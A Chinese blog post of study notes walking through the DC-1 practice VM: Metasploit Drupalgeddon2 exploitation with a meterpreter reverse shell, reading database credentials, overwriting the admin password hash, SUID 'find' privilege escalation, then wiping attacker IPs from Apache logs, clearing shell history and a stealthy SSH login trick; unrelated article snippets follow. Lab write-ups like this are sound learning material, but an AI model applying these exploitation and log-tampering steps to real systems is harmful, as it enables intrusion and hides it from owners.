泷羽sec渗透DC靶场(1)完全保姆级学习笔记

devtools/2024/11/20 3:58:10/

前言

本次学习的是在b站up主泷羽sec课程完整版跳转链接有感而发,如涉及侵权马上删除文章。
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
!!注意:蓝色点击均可进入相关对应网站。

文章目录

  • 前言
  • 一、靶机下载
  • 二、开始操作
    • 爆破目录
    • 扫描漏洞
    • 后渗透
    • 进入mysql
    • 获取密码并去mysql修改密码
    • 根据提示找flag4
  • 三、痕迹清楚
    • 清理错误请求日志
    • 一大堆kali攻击日志
    • 密码还原(之前数据库改成123456了还原一下)
    • 清楚数据库日志
    • 清楚命令历史
    • nmap扫描日志
  • 扩展
  • 总结

一、靶机下载

DC靶场1-9(全)
靶机官网下载(这个很慢不如上面)

二、开始操作

解压下载好的
双击在这里插入图片描述
在这里插入图片描述
开启靶机,网络连接修改为桥接模式
在这里插入图片描述

arp-scan -l  看一下网络中的设备及其对应的 MAC 地址

在这里插入图片描述
在这里插入图片描述
MAC地址一样没问题

nmap 192.168.0.119 -p- -v

在这里插入图片描述
有80端口访问一下
在这里插入图片描述
尝试了一下万能密码,然后看一下版本系统:Drupal
在这里插入图片描述

爆破目录

dirb http://192.168.0.119:80
扫描到一个robots.txt和web.config没有什么作用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

扫描漏洞

whatweb -v 192.168.0.119

在这里插入图片描述

msfconsole
search Drupal
show payloads
use unix/webapp/drupal_drupalgeddon2
# 或者
use 1
# 然后
show payloads # 显示该模块下的所有payload
set payload/php/meterpreter/reverse_tcp  
run
optios
sudo iptables -I INPUT -p tcp --dport 4444 -j ACCEPT
run
set rhosts 你攻击的ip
getuid

后渗透

sysinfo
shell
完事可以使用python调用系统终端
python -c "import pty;pty.spawn('/bin/bash')"
ls看看都有啥
cat flag1.txt

他说下一步要找一个cms的配置文件,一般配置文件都是settings.xxx,这里我们从当前目录模糊查询一下

find . -name 'set*'
cat ./sites/default/settings.php
复制一下数据是masyql的
$databases = array ('default' =>array ('default' =>array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);

进入mysql

用户名dbuser  密码R0ck3t
mysql -udbuser -pR0ck3t

查一下表

show databases
;
use drupaldb
show tables;
select * from users;   等于  select * from users\G;

在这里插入图片描述在这里插入图片描述

解不出,看下hash
exit
find . -name '*hash*'
cat ./scripts/password-hash.sh  没啥东西
cd ./scripts   看下目录
./scripts/password-hash.sh 123456

在这里插入图片描述在这里插入图片描述

获取密码并去mysql修改密码

password: 123456                
hash: $S$DVi1ZUQrDwmZj0tT/lAvD.pztpGqoZwMJk/pJXJfoA3MYGG9Jnm7mysql -udbuser -pR0ck3t
USE drupaldb;
UPDATE users 
SET pass = '$S$DVi1ZUQrDwmZj0tT/lAvD.pztpGqoZwMJk/pJXJfoA3MYGG9Jnm7' 
WHERE name = 'admin';

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
翻译一下
在这里插入图片描述

根据提示找flag4

cat /etc/passwd
cd /home/flag4
ls
cat flag4.txt
ls -l /etc/passwd

在这里插入图片描述
查看这个文件的权限,尝试追加用户提权,但是只能root读写
在这里插入图片描述

find / -perm -u=s -type f  2>/dev/null
# `1>/dev/null`用于丢弃正常输出,而`2>/dev/null`用于丢弃错误输出。

使用find提权

find / -exec "/bin/bash" -p \;

在这里插入图片描述

cd /root
ls
cat thefinalflag.txt

在这里插入图片描述

三、痕迹清楚

观察一下我们刚刚使用过的操作,登录数据库数据库日志),msf漏洞利用(kaliweb请求),命令使用(history)
清理web请求(阿帕奇日志)

find / -name 'access*'
cat /var/log/apache2/access.log
sed -i '/192.168.0.119/d' /var/log/apache2/access.log
sed -i '/192.168.0.100/d' /var/log/apache2/access.log
筛选自己的主机(192.168.209.1)和攻击机器(192.168.209.151)的请求记录
cat /var/log/apache2/access.log

在这里插入图片描述

清理错误请求日志

find / -name 'error*'
cat /var/log/apache2/error.log

一大堆kali攻击日志

sed -i '/192.168.0.100/d' /var/log/apache2/error.log

在这里插入图片描述

密码还原(之前数据库改成123456了还原一下)

mysql -udbuser -pR0ck3t
USE drupaldb;
UPDATE users 
SET pass = '$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR' 
WHERE name = 'admin';

清楚数据库日志

mysql -udbuser -pR0ck3t
show binary logs;
show variables like '%log%'; 查看日志状态

在这里插入图片描述

清楚命令历史

history
history -c # 清除命令历史

登录日志这里我们使用的是反弹shell,实际上并没有登录,不会增加一条标准的ssh登录日志,这里跳过。

nmap扫描日志

用自己的kali
cd /tmp
find . -name 'namp'
find . -name '*namp*'
history -c

扩展

ssh -T root@192.168.0.1 /bin/bash -i 
隐身登录系统,不会被w、who、last等指令检测到。ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
不记录ssh公钥在本地.ssh目录中

总结

今天也是艰难的把DC靶场一打下来了,一步步的复刻就很难,今天也是学到了很多知识,又是开心的一天,明天继续努力。


http://www.ppmy.cn/devtools/135377.html

相关文章

日常ctf

1, [陇剑杯 2021]日志分析(问1) %2e 为URL编码的符号 "." flag{www.zip} 2, [陇剑杯 2021]日志分析(问2) 根据之前题目的分析,在获取到源码文件之后,黑客又成功访问了in…

汽车资讯新动力:Spring Boot技术驱动

2相关技术 2.1 MYSQL数据库 MySQL是一个真正的多用户、多线程SQL数据库服务器。 是基于SQL的客户/服务器模式的关系数据库管理系统,它的有点有有功能强大、使用简单、管理方便、安全可靠性高、运行速度快、多线程、跨平台性、完全网络化、稳定性等,非常…

【论文阅读】Large Language Models for Equivalent Mutant Detection: How Far Are We?

阅读笔记:Large Language Models for Equivalent Mutant Detection: How Far Are We? 1. 来源出处 本文发表于《ISSTA’24, September 16–20, 2024, Vienna, Austria》会议,由Zhao Tian, Honglin Shu, Dong Wang, Xuejie Cao, Yasutaka Kamei和Junji…

机器学习算法之KNN分类算法【附python实现代码!可运行】

一、简介 在机器学习中,KNN(k-Nearest Neighbors)分类算法是一种简单且有效的监督学习算法,主要用于分类问题。KNN算法的基本思想是:在特征空间中,如果一个样本在特征空间中的k个最相邻的样本中的大多数属…

Dowex 50WX8 ion-exchange resin可以用于去除水中的金属离子(如钠、钾、镁、钙等)和其他杂质,提高水质,11119-67-8

一、基本信息 中文名称:Dowex 50WX8 离子交换树脂 英文名称:Dowex 50WX8 ion-exchange resin CAS号:11119-67-8 供应商:陕西新研博美生物科技 外观:米色至浅棕色或绿棕色粉末/微球状 纯度:≥95% 分子…

数据分析-48-时间序列变点检测之在线实时数据的CPD

文章目录 1 时间序列结构1.1 变化点的定义1.2 结构变化的类型1.2.1 水平变化1.2.2 方差变化1.3 变点检测1.3.1 离线数据检测方法1.3.2 实时数据检测方法2 模拟数据2.1 模拟恒定方差数据2.2 模拟变化方差数据3 实时数据CPD3.1 SDAR学习算法3.2 Changefinder模块3.3 恒定方差CPD3…

Elasticsearch 重建索引 数据迁移

Elasticsearch 重建索引 数据迁移 处理流程创建临时索引数据迁移重建索引写在最后 大家都知道,es的索引创建完成之后就不可以再修改了,包括你想更改字段属性或者是分词方式等。那么随着业务数据量的发展,可能会出现需要修改索引,或…

跨平台WPF框架Avalonia教程 五

样式 Avalonia UI 的样式系统是一种可以在控件之间共享属性设置的机制。 提示 在 Avalonia 中,Style 更类似于 CSS 样式,而不是 WPF/UWP 样式。在 Avalonia 中,与 WPF/UWP 中的样式相当的是ControlTheme。 工作原理​ 实质上&#xff0c…